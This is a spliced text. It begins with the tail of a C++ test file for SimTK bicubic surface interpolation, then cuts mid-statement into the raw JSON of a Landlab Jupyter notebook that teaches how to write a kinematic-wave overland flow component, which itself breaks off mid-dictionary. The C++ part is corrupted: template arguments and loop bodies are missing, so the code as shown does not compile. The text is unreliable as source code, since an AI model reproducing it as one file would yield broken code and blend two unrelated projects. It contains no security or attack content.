bcsFxyy(tsize,tsize), bcsFxxx(tsize,tsize);\n Matrix bcsFyyy(tsize,tsize), bcsF4x(tsize,tsize), bcsF4y(tsize,tsize);\n\n //Numerically computed derivatives\n Matrix numFx(tsize,tsize), numFy(tsize,tsize);\n Matrix numFxy(tsize,tsize), numFxx(tsize,tsize), numFyy(tsize,tsize);\n Matrix numFxxy(tsize,tsize), numFxyy(tsize,tsize), numFxxx(tsize,tsize);\n Matrix numFyyy(tsize,tsize);\n\n aXY(0) = xV(1);\n aXY(1) = yV(1);\n\n //Sample the surface about aXY over a 17x17 grid\n for(int i=0;i dX(1);\n Array_ dY(1);\n Array_ dXY(2);\n Array_ dXX(2);\n Array_ dYY(2);\n Array_ dXXY(3);\n Array_ dXYY(3);\n Array_ dXXX(3);\n Array_ dYYY(3);\n Array_ d4X(4);\n Array_ d4Y(4);\n\n dX[0] = 0;\n dY[0] = 1;\n dXY[0]= 0;\n dXY[1]= 1;\n dXX[0]= 0;\n dXX[1]= 0;\n dYY[0]= 1;\n dYY[1]= 1;\n dXXY[0]= 0;\n dXXY[1]= 0;\n dXXY[2]= 1;\n dXYY[0]= 0;\n dXYY[1]= 1;\n dXYY[2]= 1;\n dXXX[0]= 0;\n dXXX[1]= 0;\n dXXX[2]= 0;\n dYYY[0]= 1;\n dYYY[1]= 1;\n dYYY[2]= 1;\n\nfor(int i=0;i<16;i++){\n aXY(0) = xmin + i*deltaX;\n for(int j=0;j<16;j++){\n aXY(1) = ymin + j*deltaY;\n SimTK_TEST_EQ(bcsf.calcValue(aXY), bcsCCf.calcValue(aXY));\n SimTK_TEST_EQ(bcsf.calcValue(aXY),bcsEQOPf.calcValue(aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dX,aXY), bcsCCf.calcDerivative(dX,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dX,aXY),bcsEQOPf.calcDerivative(dX,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dY,aXY), bcsCCf.calcDerivative(dY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dY,aXY),bcsEQOPf.calcDerivative(dY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXY,aXY), bcsCCf.calcDerivative(dXY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXY,aXY),bcsEQOPf.calcDerivative(dXY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXY,aXY), bcsCCf.calcDerivative(dXXY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXY,aXY),bcsEQOPf.calcDerivative(dXXY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXYY,aXY), bcsCCf.calcDerivative(dXYY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXYY,aXY),bcsEQOPf.calcDerivative(dXYY,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXX,aXY), bcsCCf.calcDerivative(dXXX,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dXXX,aXY),bcsEQOPf.calcDerivative(dXXX,aXY));\n\n SimTK_TEST_EQ(bcsf.calcDerivative(dYYY,aXY), bcsCCf.calcDerivative(dYYY,aXY));\n SimTK_TEST_EQ(bcsf.calcDerivative(dYYY,aXY),bcsEQOPf.calcDerivative(dYYY,aXY));\n }\n}\n\n}\n\nvoid testHint() {\n const Real xData[4] = { .1, 1, 2, 10 };\n const Real yData[5] = { -3, -2, 0, 1, 3 };\n const Real fData[] = { 1, 2, 3, 4, 5,\n 1.1, 2.1, 3.1, 4.1, 5.1,\n 1, 2, 3, 4, 5,\n 1.2, 2.2, 3.2, 4.2, 5.2 };\n const Vector x(4, xData);\n const Vector y(5, yData);\n const Matrix f(4,5, fData);\n BicubicSurface surf(x, y, f, 0); // not smoothed\n\n SimTK_TEST(surf.getNumAccesses() == 0);\n\n BicubicSurface::PatchHint hint;\n Real val = surf.calcValue(Vec2(.5, .5), hint);\n SimTK_TEST(surf.getNumAccesses() == 1);\n val = surf.calcValue(Vec2(.5, .5), hint); // should be free\n SimTK_TEST(surf.getNumAccesses() == 2);\n SimTK_TEST(surf.getNumAccessesSamePoint() == 1);\n\n val = surf.calcValue(Vec2(.50001, .50002), hint);\n SimTK_TEST(surf.getNumAccessesSamePatch() == 1);\n\n val = surf.calcValue(Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesNearbyPatch() == 1);\n\n // This should report \"same patch\" rather than \"same point\" because\n // derivative info hasn't been calculated yet.\n Array_ deriv1(1, 1), deriv2(2, 0); // fy, fxx\n val = surf.calcDerivative(deriv2, Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesSamePatch() == 2);\n\n // When 2nd deriv info is calculated we get 1st deriv also. So now\n // we should get \"same point\" even though we haven't asked for this yet.\n val = surf.calcDerivative(deriv1, Vec2(1.5, -1), hint);\n SimTK_TEST(surf.getNumAccessesSamePoint() == 2);\n\n}\n\nint main() {\n //Evaluate the bicubic surface interpolation against an analytical \n //function. Throw an error if the values of the function are different\n //at the knot points, or different within tolerance at the mid grid points\n SimTK_START_TEST(\"Testing Bicubic Interpolation\");\n SimTK_SUBTEST(testHint);\n\n cout << \"\\n---------------------------------------------\"<< endl;\n cout<< \"\\n\\nANALYTICAL FUNCTION COMPARISON:\" << endl;\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,0,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,1,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,2,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,3,false,false);\n testBicubicAgainstAnalyticFcn(0.0, 1.0, 0.0, 1.0,9,4,false,false);\n printf(\"\\n\\n*Test Passed*. Constructor with x,y,f,fx,fy,fxy specified,\"\n \" \\n\\tSmoothness parameter %f tested\\n\"\n \"\\tAdditional smoothness parameters not tested because\"\n \"\\n\\tsurface will not pass through the knot points\",Real(0));\n cout << \"\\n---------------------------------------------\"<< endl;\n\n cout << \"\\n---------------------------------------------\"<< endl;\n cout << \"\\n\\nBICUBIC COEFFICIENT VALIDATION:\" << endl;\n cout << \" Testing that the bicubic interpolation coefficients\" <\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"# How to write a Landlab component\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"
\\n\",\n \"For more Landlab tutorials, click here: https://landlab.readthedocs.io/en/latest/user_guide/tutorials.html\\n\",\n \"
\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"This ipython notebook walks you through the basic procedure for writing a Landlab component, using the example of a kinematic-wave flow model.\\n\",\n \"\\n\",\n \"## Overview\\n\",\n \"A Landlab component is implemented as a Python `class`. Although every Landlab component is unique in some respects, to be a component, a class must have at least the following standard ingredients:\\n\",\n \"\\n\",\n \"(1) The class must inherit the base class `Component`.\\n\",\n \"\\n\",\n \"(2) The class must include a set of standard variables defined in the header (i.e., before the `__init__` method), which describe the data arrays that the component uses.\\n\",\n \"\\n\",\n \"(3) The class must have an `__init__` method defined, with a semi-standardized parameter list described below.\\n\",\n \"\\n\",\n \"(4) The class must provide a function that does performs the component's \\\"action\\\", typically named `run_one_step()` and this function's parameter list must follow the convention described below.\\n\",\n \"\\n\",\n \"\\n\",\n \"## Class definition and header\\n\",\n \"\\n\",\n \"A Landlab component is a class that inherits from `Component`. The name of the class should be in CamelCase, and should make sense when used in the sentence: \\\"A *(component-name)* is a...\\\". The class definition should be followed by a docstring. The docstring should include a list of parameters for the `__init__` method and succintly describe them.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component, FieldError\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" Calculate water flow over topography.\\n\",\n \" \\n\",\n \" Landlab component that implements a two-dimensional \\n\",\n \" kinematic wave model.\\n\",\n \" \\n\",\n \" You can put other information here... Anything you \\n\",\n \" think a user might need to know. We use numpy style\\n\",\n \" docstrings written in restructured text. You can use\\n\",\n \" math formatting. \\n\",\n \" \\n\",\n \" Useful Links:\\n\",\n \" - https://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html\\n\",\n \" - https://sphinxcontrib-napoleon.readthedocs.io/en/latest/example_numpy.html\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" A Landlab grid object.\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughnes : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \"\\n\",\n \" \\\"\\\"\\\"\\n\",\n \"\\n\",\n \" def __init__(): # ignore this for now, we will add more stuff eventually.\\n\",\n \" pass\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## Doc tests\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The following docstring section 'Examples' should help the user understand what is the component's purpose and how it works. It is an example (or examples) of its use in a (more or less) simple case within the Landlab framework: a grid is created, the component is instantiated on this grid and run. Unlike in the example below, we strongly recommend commenting your example(s) to explain what is happening.\\n\",\n \"\\n\",\n \"This is also the section that will be run during the integration tests of your component (once you have submitted a pull request to have your component merged into the Landlab release branch). All lines starting with >>> are run and should produce the results you provided: here, the test will fail if `kw.vel_coeff` does not return `100.0.`\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"\\\"\\\"\\\"\\n\",\n \" Examples\\n\",\n \" --------\\n\",\n \" >>> from landlab import RasterModelGrid\\n\",\n \" >>> rg = RasterModelGrid((4, 5), 10.0)\\n\",\n \" >>> kw = KinwaveOverlandFlowModel(rg)\\n\",\n \" >>> kw.vel_coef\\n\",\n \" 100.0\\n\",\n \" >>> rg.at_node['surface_water__depth']\\n\",\n \" array([ 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.])\\n\",\n \" \\\"\\\"\\\"\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_name`\\n\",\n \"Every component should have a name, as a string. Normally this will be the same as the class name.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_name = \\\"KinwaveOverlandFlowModel\\\"\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_unit_agnostic`\\n\",\n \"\\n\",\n \"Components also indicate whether they are unit agnostic or not. Unit agnostic components require that component users are consistent with units within and across components used in a single application, but do not require that inputs conform to a specific set of units. \\n\",\n \"\\n\",\n \"This component is not unit agnostic because it includes an assumption that time units will be in hours but assumes that the Manning coefficient will be provided with time units of seconds. \"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_unit_agnostic = False\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_info`\\n\",\n \"\\n\",\n \"\\n\",\n \"All the metadata about the fields that a components requires and creates is described in a datastructured called `Component._info`. \\n\",\n \"\\n\",\n \"Info is a dictionary with one key for each field. The value associated with that key is a dictionary that must contain all of the following elements (and no other elements). \\n\",\n \"\\n\",\n \"* \\\"dtype\\\": a python data type\\n\",\n \"* \\\"intent\\\": a string indicating whether the field is an input (\\\"in\\\"), and output (\\\"out\\\"), or both (\\\"inout\\\")\\n\",\n \"* \\\"optional\\\": a boolean indicating whether the field is an optional input or output\\n\",\n \"* \\\"units\\\": a string indicating what units the field has (use \\\"-\\\")\\n\",\n \"* \\\"mapping\\\": a string indicating the grid element (e.g., node, cell) on which the field is located\\n\",\n \"* \\\"doc\\\": a string describing the field. \\n\",\n \"\\n\",\n \"The code in the Component base class will check things like:\\n\",\n \"* Can the component be created if all of the required inputs exist?\\n\",\n \"* Is all this information present? Is something extra present?\\n\",\n \"* Does the component create outputs of the correct dtype?\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \"}\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Class with complete header information\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component, FieldError\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" Calculate water flow over topography.\\n\",\n \" \\n\",\n \" Landlab component that implements a two-dimensional \\n\",\n \" kinematic wave model.\\n\",\n \" \\n\",\n \" Construction:\\n\",\n \" \\n\",\n \" KinwaveOverlandFlowModel(grid, [stuff to be added later])\\n\",\n \" \\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" \\n\",\n \" _name = \\\"KinwaveOverlandFlowModel\\\"\\n\",\n \"\\n\",\n \" _unit_agnostic = False\\n\",\n \" \\n\",\n \" _info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" }\\n\",\n \"\\n\",\n \" def __init__(): # ignore this for now, we will add more stuff eventually.\\n\",\n \" pass\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The initialization method (`__init__`)\\n\",\n \"Every Landlab component should have an `__init__` method. The parameter signature should start with a `ModelGrid` object as the first parameter. Following this are component-specific parameters. In our example, the parameters for the kinematic wave model include: precipiation rate, precipitation duration, infiltration rate, and roughness coefficient (Manning's n).\\n\",\n \"\\n\",\n \"The first thing the component `__init__` should do is call the `super` method. This calls the `__init__` of the component's base class. \\n\",\n \"\\n\",\n \"Two things a component `__init__` method common does are (1) store the component's parameters as class attributes, and (2) create the necessary fields. When creating grid fields, it is important to first check to see whether a field with the same name (and mapping) already exists. For example, a driver or another component might have already created `topographic__elevation` when our kinematic wave component is initialized.\\n\",\n \"\\n\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def __init__(\\n\",\n \" self, grid, precip_rate=1.0, precip_duration=1.0, infilt_rate=0.0, roughness=0.01\\n\",\n \"):\\n\",\n \" \\\"\\\"\\\"Initialize the KinwaveOverlandFlowModel.\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store parameters and do unit conversion\\n\",\n \" self._current_time = 0\\n\",\n \"\\n\",\n \" self._precip = precip_rate / 3600000.0 # convert to m/s\\n\",\n \" self._precip_duration = precip_duration * 3600.0 # h->s\\n\",\n \" self._infilt = infilt_rate / 3600000.0 # convert to m/s\\n\",\n \" self._vel_coef = 1.0 / roughness # do division now to save time\\n\",\n \"\\n\",\n \" # Create fields...\\n\",\n \" # Elevation\\n\",\n \" self._elev = grid.at_node[\\\"topographic__elevation\\\"]\\n\",\n \"\\n\",\n \" # Slope\\n\",\n \" self._slope = grid.at_link[\\\"topographic__gradient\\\"]\\n\",\n \"\\n\",\n \" self.initialize_output_fields()\\n\",\n \" self._depth = grid.at_node[\\\"surface_water__depth\\\"]\\n\",\n \" self._vel = grid.at_link[\\\"water__velocity\\\"]\\n\",\n \" self._disch = grid.at_link[\\\"water__specific_discharge\\\"]\\n\",\n \"\\n\",\n \" # Calculate the ground-surface slope (assume it won't change)\\n\",\n \" self._slope[self._grid.active_links] = self._grid.calc_grad_at_link(self._elev)[\\n\",\n \" self._grid.active_links\\n\",\n \" ]\\n\",\n \" self._sqrt_slope = np.sqrt(self._slope)\\n\",\n \" self._sign_slope = np.sign(self._slope)\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The \\\"go\\\" method, `run_one_step()`\\n\",\n \"Every Landlab component will have a method that implements the component's action. The go method can have any name you like, but the preferred practice for time-advancing components is to use the standard name `run_one_step()`. Landlab assumes that if a component has a method with this name, it will (a) be the primary \\\"go\\\" method, and (b) will be fully standardized as described here.\\n\",\n \"\\n\",\n \"The `run_one_step` method should take either zero or one argument. If there is an argument, it should be a duration to run, `dt`; i.e., a timestep length. If the component does not evolve as time passes, this argument may be missing (see, e.g., the FlowRouter, which returns a steady state flow pattern independent of time).\\n\",\n \"\\n\",\n \"The first step in the algorithm in the example below is to calculate water depth *at the links*, where we will be calculating the water discharge. In this particular case, we'll use the depth at the upslope of the two nodes. The grid method to do this, `map_value_at_max_node_to_link`, is one of many mapping functions available.\\n\",\n \"\\n\",\n \"We then calculate velocity using the Manning equation, and specific discharge by multiplying velocity by depth.\\n\",\n \"\\n\",\n \"Mass balance for the cells around nodes is computed using the `calc_flux_div_at_node` grid method.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \"\\n\",\n \" Default units for dt are *seconds*.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # Calculate water depth at links. This implements an \\\"upwind\\\" scheme\\n\",\n \" # in which water depth at the links is the depth at the higher of the\\n\",\n \" # two nodes.\\n\",\n \" H_link = self._grid.map_value_at_max_node_to_link(\\n\",\n \" \\\"topographic__elevation\\\", \\\"surface_water__depth\\\"\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate velocity using the Manning equation.\\n\",\n \" self._vel = (\\n\",\n \" -self._sign_slope * self._vel_coef * H_link ** 0.66667 * self._sqrt_slope\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate discharge\\n\",\n \" self._disch = H_link * self._vel\\n\",\n \"\\n\",\n \" # Flux divergence\\n\",\n \" dqda = self._grid.calc_flux_div_at_node(self._disch)\\n\",\n \"\\n\",\n \" # Rate of change of water depth\\n\",\n \" if self._current_time < self._precip_duration:\\n\",\n \" ppt = self._precip\\n\",\n \" else:\\n\",\n \" ppt = 0.0\\n\",\n \" dHdt = ppt - self._infilt - dqda\\n\",\n \"\\n\",\n \" # Update water depth: simple forward Euler scheme\\n\",\n \" self._depth[self._grid.core_nodes] += dHdt[self._grid.core_nodes] * dt\\n\",\n \"\\n\",\n \" # Very crude numerical hack: prevent negative water depth\\n\",\n \" self._depth[np.where(self._depth < 0.0)[0]] = 0.0\\n\",\n \"\\n\",\n \" self._current_time += dt\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## Changes to boundary conditions\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Sometimes, (though not in this example), it proves convenient to hard-code assumptions about boundary conditions into the `__init__` method. \\n\",\n \"\\n\",\n \"We can resolve this issue by creating an additional component method that updates these components that can be called if the boundary conditions change. Whether the boundary conditions have changed can be assessed with a grid method called `bc_set_code`. This is an `int` which will change if the boundary conditions change.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def __init__(self):\\n\",\n \" \\\"\\\"\\\"Initialize the Component.\\n\",\n \" ...\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store grid and parameters and do unit conversion\\n\",\n \" self._bc_set_code = self._grid.bc_set_code\\n\",\n \" # ...\\n\",\n \"\\n\",\n \"\\n\",\n \"def updated_boundary_conditions(self):\\n\",\n \" \\\"\\\"\\\"Call if boundary conditions are updated.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # do things necessary if BCs are updated.\\n\",\n \"\\n\",\n \"\\n\",\n \"def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" if self._bc_set_code != self.grid.bc_set_code:\\n\",\n \" self.updated_boundary_conditions()\\n\",\n \" self._bc_set_code = self.grid.bc_set_code\\n\",\n \" # Do rest of run one step\\n\",\n \" # ...\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The complete component\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" \\\"\\\"\\\"Calculate water flow over topography.\\n\",\n \"\\n\",\n \" Landlab component that implements a two-dimensional\\n\",\n \" kinematic wave model. This is an extremely simple, unsophisticated\\n\",\n \" model, originally built simply to demonstrate the component creation\\n\",\n \" process. Limitations to the present version include: infiltration is\\n\",\n \" handled very crudely, the called is responsible for picking a stable\\n\",\n \" time step size (no adaptive time stepping is used in the `run_one_step`\\n\",\n \" method), precipitation rate is constant for a given duration (then zero),\\n\",\n \" and all parameters are uniform in space. Also, the terrain is assumed\\n\",\n \" to be stable over time. Caveat emptor!\\n\",\n \"\\n\",\n \" Examples\\n\",\n \" --------\\n\",\n \" >>> from landlab import RasterModelGrid\\n\",\n \" >>> rg = RasterModelGrid((4, 5), xy_spacing=10.0)\\n\",\n \" >>> z = rg.add_zeros(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \" >>> s = rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \" >>> kw = KinwaveOverlandFlowModel(rg)\\n\",\n \" >>> kw.vel_coef\\n\",\n \" 100.0\\n\",\n \" >>> rg.at_node['surface_water__depth']\\n\",\n \" array([ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0., 0., 0.])\\n\",\n \" \\\"\\\"\\\"\\n\",\n \"\\n\",\n \" _name = \\\"KinwaveOverlandFlowModel\\\"\\n\",\n \"\\n\",\n \" _unit_agnostic = False\\n\",\n \"\\n\",\n \" _info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n 